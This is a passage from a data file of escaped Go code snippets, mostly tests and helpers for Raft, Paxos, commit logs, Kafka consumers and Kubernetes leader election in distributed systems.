nil {\n\t\tt.Fatalf(\"Unable to partially commit: %v\", err)\n\t}\n\texpected := \n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\"\n\tactual, _ := ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n\n\t// Full commit.\n\tif err := log.SetCommitIndex(3); err != nil {\n\t\tt.Fatalf(\"Unable to commit: %v\", err)\n\t}\n\texpected = \n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`6ac5807c 0000000000000003 0000000000000002 cmd_1 {\"val\":\"bar\",\"i\":0}`+\"\\n\"\n\tactual, _ = ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n}", "func TestCommitLogRotateLogsConcurrency(t *testing.T) {\n\tvar (\n\t\topts, _ = newTestOptions(t, overrides{\n\t\t\tstrategy: StrategyWriteBehind,\n\t\t})\n\t\tnumFilesRequired = 10\n\t)\n\n\topts = opts.SetBlockSize(1 * time.Millisecond)\n\tdefer cleanup(t, opts)\n\n\tvar (\n\t\tdoneCh = make(chan struct{})\n\t\tcommitLog = newTestCommitLog(t, opts)\n\t)\n\n\t// One goroutine continuously writing.\n\tgo func() {\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-doneCh:\n\t\t\t\treturn\n\t\t\tdefault:\n\t\t\t\ttime.Sleep(time.Millisecond)\n\t\t\t\terr := commitLog.Write(\n\t\t\t\t\tcontext.NewBackground(),\n\t\t\t\t\ttestSeries(t, opts, 0, \"foo.bar\", testTags1, 127),\n\t\t\t\t\tts.Datapoint{},\n\t\t\t\t\txtime.Second,\n\t\t\t\t\tnil)\n\t\t\t\tif err == errCommitLogClosed {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif err == ErrCommitLogQueueFull {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif err != nil {\n\t\t\t\t\tpanic(err)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n\n\t// One goroutine continuously rotating logs.\n\tgo func() {\n\t\tvar (\n\t\t\tlastSeenFile string\n\t\t\tnumFilesSeen int\n\t\t)\n\t\tfor numFilesSeen < numFilesRequired {\n\t\t\ttime.Sleep(100 * time.Millisecond)\n\t\t\tfile, err := commitLog.RotateLogs()\n\t\t\tif err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t\tif file.FilePath != lastSeenFile {\n\t\t\t\tlastSeenFile = file.FilePath\n\t\t\t\tnumFilesSeen++\n\t\t\t}\n\t\t}\n\t\tclose(doneCh)\n\t}()\n\n\t<-doneCh\n\n\trequire.NoError(t, commitLog.Close())\n}", "func TestPartitionOfCluster(t *testing.T) {\n\n\n\trafts, cluster := makeMockRafts() // array of []raft.Node\n\n\tfor i:=0; i<5; i++ {\n\t\tdefer rafts[i].raft_log.Close()\n\t\tgo rafts[i].processEvents()\n\t}\n\n\ttime.Sleep(2*time.Second)\n\tvar ldr *RaftNode\n\tvar mutex sync.RWMutex\n\tfor {\n\t\tmutex.Lock()\n\t\tldr = getLeader(rafts)\n\t\tif (ldr != nil) {\n\t\t\tbreak\n\t\t}\n\t\tmutex.Unlock()\n\t}\n\n\tldr.Append([]byte(\"foo\"))\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\t//if ci.Err != nil {t.Fatal(ci.Err)}\n\t\t\tif string(ci.Data.Data) != \"foo\" {\n\t\t\t\tt.Fatal(\"Got different data\")\n\t\t\t}\n\t\tdefault:\n\t\t}\n\t}\n\n\n\tfor {\n\t\tldr = getLeader(rafts)\n\t\tif (ldr != nil) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif(ldr.Id() == 1 || ldr.Id() == 0) {\n\t\tcluster.Partition([]int{0, 1}, []int{2, 3, 4})\n\t} else if(ldr.Id() == 2) {\n\t\tcluster.Partition([]int{0, 1, 3}, []int{2, 4})\n\t} else {\n\t\tcluster.Partition([]int{0, 1, 2}, []int{3, 4})\n\t}\n\n\tldr.Append([]byte(\"foo2\"))\n\tvar ldr2 *RaftNode\n\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\tt.Fatal(\"Got different data \"+ string(ci.Data.Data))\n\t\tdefault:\n\t\t}\n\t}\n\n\tcluster.Heal()\n\n\ttime.Sleep(3*time.Second)\n\tfor {\n\t\tldr2 = getLeader(rafts)\n\n\t\tif (ldr2 != nil && ldr2.sm.serverID != ldr.sm.serverID) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// Leader will not have \"fooAgain\" entry, will force new entry to all nodes\n\tldr2.Append([]byte(\"foo3\"))\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\tif string(ci.Data.Data) != \"foo3\" {\n\t\t\t\tt.Fatal(\"Got different data \"+ string(ci.Data.Data))\n\t\t\t}\n\t\t}\n\t}\n\n\tfor _, node := range rafts {\n\t\tnode.Shutdown()\n\t}\n\n}", "func TestLeaderTransferBack(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\t// Transfer leadership back to self.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (self *WAL) Commit(requestNumber uint32, serverId uint32) error {\n\tconfirmationChan := make(chan *confirmation)\n\tself.entries <- &commitEntry{confirmationChan, serverId, requestNumber}\n\tconfirmation := <-confirmationChan\n\treturn confirmation.err\n}", "func TestRaft2(t *testing.T) {\n\tack := make(chan bool)\n\n\tleader := raft.GetLeaderId()\n\n\t//Kill some one who is not a leader\n\ts1 := (leader + 1) % 5\n\traft.KillServer(s1)\n\tt.Log(\"Killed \", s1)\n\n\t//Once more\n\ts2 := (s1 + 1) % 5\n\traft.KillServer(s2)\n\tt.Log(\"Killed \", s2)\n\n\t//Kill leader now\n\tleader = raft.KillLeader()\n\n\t//Make sure new leader doesn't get elected\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tleaderId := raft.GetLeaderId()\n\t\tif leaderId != -1 {\n\t\t\tt.Error(\"Leader should not get elected!\")\n\t\t}\n\t\tack <- true\n\t})\n\t<-ack\n\n\t//Resurrect for next test cases\n\traft.ResurrectServer(leader)\n\traft.ResurrectServer(s1)\n\traft.ResurrectServer(s2)\n\n\t//Wait for 1 second for new leader to get elected\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack\n}", "func (_BaseAccessControlGroup *BaseAccessControlGroupTransactor) ConfirmCommit(opts *bind.TransactOpts) (*types.Transaction, error) {\n\treturn _BaseAccessControlGroup.contract.Transact(opts, \"confirmCommit\")\n}", "func (tx *TestTX) Commit() error {\n\targs := tx.Called()\n\treturn args.Error(0)\n}", "func (c *Consumer) CommitOffset(msg *sarama.ConsumerMessage) {\n\tc.consumer.MarkOffset(msg, \"\")\n}", "func (pn *paxosNode) RecvCommit(args *paxosrpc.CommitArgs, reply *paxosrpc.CommitReply) error {\n\treturn errors.New(\"not implemented\")\n}", "func TestConsumerPollRebalance(t *testing.T) {\n\tconsumerTestWithCommits(t, \"Poll Consumer (rebalance callback)\",\n\t\t0, false, eventTestPollConsumer,\n\t\tfunc(c *Consumer, event Event) error {\n\t\t\tt.Logf(\"Rebalanced: %s\", event)\n\t\t\treturn nil\n\t\t})\n}", "func TestBaseAggregateEventCommit(t *testing.T) {\n\tinstance := &SimpleAggregate{}\n\tstore := NewNullStore()\n\tinstance.Initialize(\"dummy-key\", counterRegistry, store)\n\tinstance.Refresh()\n\tassert.False(t, instance.isDirty(), \"The aggregate should not be dirty before any events.\")\n\n\tinstance.ApplyEvent(InitializeEvent{\n\t\tTargetValue: 3,\n\t})\n\tassert.True(t, instance.isDirty(), \"The aggregate should be dirty, after applying an event\")\n\n\tinstance.Commit()\n\tassert.False(t, instance.isDirty(), \"The aggregate should not be dirty after committing events.\")\n}", "func (m *MockQueueManager) UpdateAckLevel(ctx context.Context, messageID int64, clusterName string) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"UpdateAckLevel\", ctx, messageID, clusterName)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func TestLeaderTransferToUpToDateNode(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (psm *ProtocolStateMachine) updateCommit(newCommit uint64) {\n\tif psm.debug && psm.l() {\n\t\tpsm.logger.Debug(\n\t\t\t\"updating commit\",\n\t\t\tzap.Uint64(\"oldCommit\", psm.state.Commit), zap.Uint64(\"newCommit\", newCommit))\n\t}\n\tpsm.state.Commit = newCommit\n\tpsm.commitChan <- newCommit\n\n\tcanAckProp := psm.state.Proposal.pending &&\n\t\tpsm.state.Proposal.Index <= psm.state.Commit &&\n\t\tpsm.state.Proposal.Term <= psm.state.LogTerm\n\tif canAckProp {\n\t\tpsm.endPendingProposal()\n\t}\n}", "func TestRaftRemoveLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tID3 := \"3\"\n\tclusterPrefix := \"TestRaftRemoveLeader\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\t// Create n3.\n\tfsm3 := newTestFSM(ID3)\n\tn3 := testCreateRaftNode(getTestConfig(ID3, clusterPrefix+ID3), newStorage())\n\n\tconnectAllNodes(n1, n2, n3)\n\n\t// The cluster starts with only one node -- n1.\n\tn1.Start(fsm1)\n\tn1.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes to leader.\n\t<-fsm1.leaderCh\n\n\t// Add n2 to the cluster.\n\tpending := n1.AddNode(ID2)\n\tn2.Start(fsm2)\n\t// Wait until n2 gets joined.\n\t<-pending.Done\n\n\t// Add n3 to the cluster.\n\tpending = n1.AddNode(ID3)\n\tn3.Start(fsm3)\n\t// Wait until n3 gets joined.\n\t<-pending.Done\n\n\t// Now we have a cluster with 3 nodes and n1 as the leader.\n\n\t// Remove the leader itself.\n\tn1.RemoveNode(ID1)\n\n\t// A new leader should be elected in new configuration(n2, n3).\n\tvar newLeader *Raft\n\tselect {\n\tcase <-fsm2.leaderCh:\n\t\tnewLeader = n2\n\tcase <-fsm3.leaderCh:\n\t\tnewLeader = n1\n\t}\n\n\tnewLeader.Propose([]byte(\"data1\"))\n\tnewLeader.Propose([]byte(\"data2\"))\n\tnewLeader.Propose([]byte(\"data3\"))\n\n\t// Now n2 and n3 should commit newly proposed entries eventually>\n\tif !testEntriesEqual(fsm2.appliedCh, fsm3.appliedCh, 3) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func (s *OrderServer) processCommit() {\n\tfor e := range s.commitC {\n\t\tif s.isLeader {\n\t\t\tlog.Debugf(\"%v\", e)\n\t\t}\n\t\ts.subCMu.RLock()\n\t\tfor _, c := range s.subC {\n\t\t\tc <- e\n\t\t}\n\t\ts.subCMu.RUnlock()\n\t}\n}", "func TestReconcileClusterServiceBrokerSuccessOnFinalRetry(t *testing.T) {\n\tfakeKubeClient, fakeCatalogClient, fakeClusterServiceBrokerClient, testController, _ := newTestController(t, getTestCatalogConfig())\n\n\ttestClusterServiceClass := getTestClusterServiceClass()\n\n\tbroker := getTestClusterServiceBroker()\n\t// seven days ago, before the last refresh period\n\tstartTime := metav1.NewTime(time.Now().Add(-7 * 24 * time.Hour))\n\tbroker.Status.OperationStartTime = &startTime\n\n\tif err := reconcileClusterServiceBroker(t, testController, broker); err != nil {\n\t\tt.Fatalf(\"This should not fail : %v\", err)\n\t}\n\n\tbrokerActions := fakeClusterServiceBrokerClient.Actions()\n\tassertNumberOfClusterServiceBrokerActions(t, brokerActions, 1)\n\tassertGetCatalog(t, brokerActions[0])\n\n\tactions := fakeCatalogClient.Actions()\n\tassertNumberOfActions(t, actions, 7)\n\n\tlistRestrictions := clientgotesting.ListRestrictions{\n\t\tLabels: labels.Everything(),\n\t\tFields: fields.OneTermEqualSelector(\"spec.clusterServiceBrokerName\", broker.Name),\n\t}\n\n\t// first action should be an update action to clear OperationStartTime\n\tupdatedClusterServiceBroker := assertUpdateStatus(t, actions[0], getTestClusterServiceBroker())\n\tassertClusterServiceBrokerOperationStartTimeSet(t, updatedClusterServiceBroker, false)\n\n\tassertList(t, actions[1], &v1beta1.ClusterServiceClass{}, listRestrictions)\n\tassertList(t, actions[2], &v1beta1.ClusterServicePlan{}, listRestrictions)\n\tassertCreate(t, actions[3], testClusterServiceClass)\n\tassertCreate(t, actions[4], getTestClusterServicePlan())\n\tassertCreate(t, actions[5], getTestClusterServicePlanNonbindable())\n\n\tupdatedClusterServiceBroker = assertUpdateStatus(t, actions[6], getTestClusterServiceBroker())\n\tassertClusterServiceBrokerReadyTrue(t, updatedClusterServiceBroker)\n\n\t// verify no kube resources created\n\tkubeActions := fakeKubeClient.Actions()\n\tassertNumberOfActions(t, kubeActions, 0)\n}", "func (_Container *ContainerTransactor) ConfirmCommit(opts *bind.TransactOpts) (*types.Transaction, error) {\n\treturn _Container.contract.Transact(opts, \"confirmCommit\")\n}", "func (orch *Orchestrator) Commit() error {\n\t//orch.client.\n\n\torch.orch.Spec.Namespaces = []*orchestration.NamespaceSpec{}\n\tfor _, dc := range orch.DCs {\n\t\tif dc.Mode == testbed.Managed {\n\t\t\torch.orch.Spec.Namespaces = append(orch.orch.Spec.Namespaces,\n\t\t\t\t&orchestration.NamespaceSpec{\n\t\t\t\t\tMode: \"Managed\",\n\t\t\t\t\tName: dc.DCName,\n\t\t\t\t\tManagedSpec: &orchestration.ManagedNamespaceSpec{\n\t\t\t\t\t\tNumUplinks: 2,\n\t\t\t\t\t},\n\t\t\t\t})\n\t\t} else {\n\t\t\torch.orch.Spec.Namespaces = append(orch.orch.Spec.Namespaces,\n\t\t\t\t&orchestration.NamespaceSpec{\n\t\t\t\t\tMode: \"Monitored\",\n\t\t\t\t\tName: dc.DCName,\n\t\t\t\t\tMonitoredSpec: &orchestration.MonitoredNamespaceSpec{},\n\t\t\t\t})\n\t\t}\n\t}\n\treturn orch.client.CreateOrchestration(orch.orch)\n}", "func TestEnroll(t *testing.T) {\n\n\tfabricCAClient, err := NewFabricCAClient(org1, configImp, cryptoSuiteProvider)\n\tif err != nil {\n\t\tt.Fatalf(\"NewFabricCAClient return error: %v\", err)\n\t}\n\t_, _, err = fabricCAClient.Enroll(\"\", \"user1\")\n\tif err == nil {\n\t\tt.Fatalf(\"Enroll didn't return error\")\n\t}\n\tif err.Error() != \"enrollmentID required\" {\n\t\tt.Fatalf(\"Enroll didn't return right error\")\n\t}\n\t_, _, err = fabricCAClient.Enroll(\"test\", \"\")\n\tif err == nil {\n\t\tt.Fatalf(\"Enroll didn't return error\")\n\t}\n\tif err.Error() != \"enrollmentSecret required\" {\n\t\tt.Fatalf(\"Enroll didn't return right error\")\n\t}\n\t_, _, err = fabricCAClient.Enroll(\"enrollmentID\", \"enrollmentSecret\")\n\tif err != nil {\n\t\tt.Fatalf(\"fabricCAClient Enroll return error %v\", err)\n\t}\n\n\twrongConfigImp := mocks.NewMockConfig(wrongCAServerURL)\n\tfabricCAClient, err = NewFabricCAClient(org1, wrongConfigImp, cryptoSuiteProvider)\n\tif err != nil {\n\t\tt.Fatalf(\"NewFabricCAClient return error: %v\", err)\n\t}\n\t_, _, err = fabricCAClient.Enroll(\"enrollmentID\", \"enrollmentSecret\")\n\tif err == nil {\n\t\tt.Fatalf(\"Enroll didn't return error\")\n\t}\n\tif !strings.Contains(err.Error(), \"enroll failed\") {\n\t\tt.Fatalf(\"Expected error enroll failed. Got: %s\", err)\n\t}\n\n}", "func TestLeaderTransferWithCheckQuorum(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tfor i := 1; i < 4; i++ {\n\t\tr := nt.peers[uint64(i)].(*raft)\n\t\tr.checkQuorum = true\n\t\tsetRandomizedElectionTimeout(r, r.electionTimeout+i)\n\t}\n\n\t// Letting peer 2 electionElapsed reach to timeout so that it can vote for peer 1\n\tf := nt.peers[2].(*raft)\n\tfor i := 0; i < f.electionTimeout; i++ {\n\t\tf.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestLeaderElectionReceiveMessages(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// Replayed ViewChange message should be ignored. Idempotent.\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from self should be ignored.\n\tvc = &pb.ViewChange{NodeId: 1, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for past view should be ignored.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 0}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from node 2 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n\tif exp, a := uint64(1), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n\n\t// The rest of the ViewChange messages should be ignored.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tvc = &pb.ViewChange{NodeId: 4, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n}", "func (_BaseAccessWallet *BaseAccessWalletTransactor) ConfirmCommit(opts *bind.TransactOpts) (*types.Transaction, error) {\n\treturn _BaseAccessWallet.contract.Transact(opts, \"confirmCommit\")\n}", "func Test_releaseLock_Update(t *testing.T) {\n\ttests := []struct {\n\t\tname string\n\t\tf func(t *testing.T, internalClient *kubefake.Clientset, isLeader *isLeaderTracker, cancel context.CancelFunc)\n\t}{\n\t\t{\n\t\t\tname: \"renewal fails on update\",\n\t\t\tf: func(t *testing.T, internalClient *kubefake.Clientset, isLeader *isLeaderTracker, cancel context.CancelFunc) {\n\t\t\t\tinternalClient.PrependReactor(\"update\", \"*\", func(action kubetesting.Action) (handled bool, ret runtime.Object, err error) {\n\t\t\t\t\tlease := action.(kubetesting.UpdateAction).GetObject().(*coordinationv1.Lease)\n\t\t\t\t\tif len(ptr.Deref(lease.Spec.HolderIdentity, \"\")) == 0 {\n\t\t\t\t\t\trequire.False(t, isLeader.canWrite(), \"client must release in-memory leader status before Kube API call\")\n\t\t\t\t\t}\n\t\t\t\t\treturn true, nil, errors.New(\"cannot renew\")\n\t\t\t\t})\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"renewal fails due to context\",\n\t\t\tf: func(t *testing.T, internalClient *kubefake.Clientset, isLeader *isLeaderTracker, cancel context.CancelFunc) {\n\t\t\t\tt.Cleanup(func() {\n\t\t\t\t\trequire.False(t, isLeader.canWrite(), \"client must release in-memory leader status when context is canceled\")\n\t\t\t\t})\n\t\t\t\tstart := time.Now()\n\t\t\t\tinternalClient.PrependReactor(\"update\", \"*\", func(action kubetesting.Action) (handled bool, ret runtime.Object, err error) {\n\t\t\t\t\t// keep going for a bit\n\t\t\t\t\tif time.Since(start) < 5*time.Second {\n\t\t\t\t\t\treturn false, nil, nil\n\t\t\t\t\t}\n\n\t\t\t\t\tcancel()\n\t\t\t\t\treturn false, nil, nil\n\t\t\t\t})\n\t\t\t},\n\t\t},\n\t}\n\tfor _, tt := range tests {\n\t\ttt := tt\n\t\tt.Run(tt.name, func(t *testing.T) {\n\t\t\tt.Parallel()\n\n\t\t\tinternalClient := kubefake.NewSimpleClientset()\n\t\t\tisLeader := &isLeaderTracker{tracker: &atomic.Bool{}}\n\n\t\t\tleaderElectorCtx, cancel := context.WithCancel(context.Background())\n\n\t\t\ttt.f(t, internalClient, isLeader, cancel)\n\n\t\t\tleaderElectionConfig := newLeaderElectionConfig(\"ns-001\", \"lease-001\", \"foo-001\", internalClient, isLeader)\n\n\t\t\t// make the tests run quicker\n\t\t\tleaderElectionConfig.LeaseDuration = 2 * time.Second\n\t\t\tleaderElectionConfig.RenewDeadline = 1 * time.Second\n\t\t\tleaderElectionConfig.RetryPeriod = 250 * time.Millisecond\n\n\t\t\t// note that this will block until it exits on its own or tt.f calls cancel()\n\t\t\tleaderelection.RunOrDie(leaderElectorCtx, leaderElectionConfig)\n\t\t})\n\t}\n}", "func TestConnectionProducer(t *testing.T) {\n\tconn, _ := kafka.DialLeader(context.Background(), \"tcp\", kafkaLeaderBroker, kafkaTopic, 1)\n\n\terr := conn.SetWriteDeadline(time.Now().Add(10 * time.Second))\n\tif err != nil {\n\t\tt.Error(err)\n\t}\n\t_, err = conn.WriteMessages(\n\t\tkafka.Message{Value: []byte(\"fang\")},\n\t)\n\tif err != nil {\n\t\tt.Error(err)\n\t}\n\terr = conn.Close()\n\tif err != nil {\n\t\tt.Error(err)\n\t}\n}", "func TestThatAByzantineLeaderCanNotCauseAForkBySendingTwoBlocks(t *testing.T) {\n\ttest.WithContextWithTimeout(t, 15*time.Second, func(ctx context.Context) {\n\t\tblock1 := mocks.ABlock(interfaces.GenesisBlock)\n\t\tnet := network.\n\t\t\tNewTestNetworkBuilder().\n\t\t\tWithNodeCount(4).\n\t\t\tWithTimeBasedElectionTrigger(1000 * time.Millisecond).\n\t\t\tWithBlocks(block1).\n\t\t\tBuild(ctx)\n\n\t\tnode0 := net.Nodes[0]\n\t\tnode1 := net.Nodes[1]\n\t\tnode2 := net.Nodes[2]\n\n\t\tnode0.Communication.SetOutgoingWhitelist([]primitives.MemberId{\n\t\t\tnode1.MemberId,\n\t\t\tnode2.MemberId,\n\t\t})\n\n\t\t// the leader (node0) is suggesting block1 to node1 and node2 (not to node3)\n\t\tnet.StartConsensus(ctx)\n\n\t\t// node0, node1 and node2 should reach consensus\n\t\tnet.WaitUntilNodesEventuallyCommitASpecificBlock(ctx, t, 0, block1, node0, node1, node2)\n\t})\n}", "func TestLearnerLogReplication(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tnt := newNetwork(n1, n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\n\t// n1 is leader and n2 is learner\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif !n2.isLearner {\n\t\tt.Error(\"peer 2 state: not learner, want yes\")\n\t}\n\n\tnextCommitted := n1.raftLog.committed + 1\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"somedata\")}}})\n\tif n1.raftLog.committed != nextCommitted {\n\t\tt.Errorf(\"peer 1 wants committed to %d, but still %d\", nextCommitted, n1.raftLog.committed)\n\t}\n\n\tif n1.raftLog.committed != n2.raftLog.committed {\n\t\tt.Errorf(\"peer 2 wants committed to %d, but still %d\", n1.raftLog.committed, n2.raftLog.committed)\n\t}\n\n\tmatch := n1.getProgress(2).Match\n\tif match != n2.raftLog.committed {\n\t\tt.Errorf(\"progress 2 of leader 1 wants match %d, but got %d\", n2.raftLog.committed, match)\n\t}\n}", "func (suite *KeeperTestSuite) TestGetAllPacketCommitmentsAtChannel() {\n\tpath := tibctesting.NewPath(suite.chainA, suite.chainB)\n\tsuite.coordinator.SetupClients(path)\n\n\tctxA := suite.chainA.GetContext()\n\texpectedSeqs := make(map[uint64]bool)\n\thash := []byte(\"commitment\")\n\n\tseq := uint64(15)\n\tmaxSeq := uint64(25)\n\tsuite.Require().Greater(maxSeq, seq)\n\n\t// create consecutive commitments\n\tfor i := uint64(1); i < seq; i++ {\n\t\tsuite.chainA.App.TIBCKeeper.PacketKeeper.SetPacketCommitment(ctxA, path.EndpointA.ChainName, path.EndpointB.ChainName, i, hash)\n\t\texpectedSeqs[i] = true\n\t}\n\n\t// add non-consecutive commitments\n\tfor i := seq; i < maxSeq; i += 2 {\n\t\tsuite.chainA.App.TIBCKeeper.PacketKeeper.SetPacketCommitment(ctxA, path.EndpointA.ChainName, path.EndpointB.ChainName, i, hash)\n\t\texpectedSeqs[i] = true\n\t}\n\n\t// add sequence on different channel/port\n\tsuite.chainA.App.TIBCKeeper.PacketKeeper.SetPacketCommitment(ctxA, path.EndpointA.ChainName, \"EndpointBChainName\", maxSeq+1, hash)\n\n\tcommitments := suite.chainA.App.TIBCKeeper.PacketKeeper.GetAllPacketCommitmentsAtChannel(ctxA, path.EndpointA.ChainName, path.EndpointB.ChainName)\n\n\tsuite.Equal(len(expectedSeqs), len(commitments))\n\t// ensure above for loops occurred\n\tsuite.NotEqual(0, len(commitments))\n\n\t// verify that all the packet commitments were stored\n\tfor _, packet := range commitments {\n\t\tsuite.True(expectedSeqs[packet.Sequence])\n\t\tsuite.Equal(path.EndpointA.ChainName, packet.SourceChain)\n\t\tsuite.Equal(path.EndpointB.ChainName, packet.DestinationChain)\n\t\tsuite.Equal(hash, packet.Data)\n\n\t\t// prevent duplicates from passing checks\n\t\texpectedSeqs[packet.Sequence] = false\n\t}\n}", "func TestCommitLogActiveLogsConcurrency(t *testing.T) {\n\tvar (\n\t\topts, _ = newTestOptions(t, overrides{\n\t\t\tstrategy: StrategyWriteBehind,\n\t\t})\n\t\tnumFilesRequired = 10\n\t)\n\n\tdefer cleanup(t, opts)\n\n\tvar (\n\t\tdoneCh = make(chan struct{})\n\t\tcommitLog = newTestCommitLog(t, 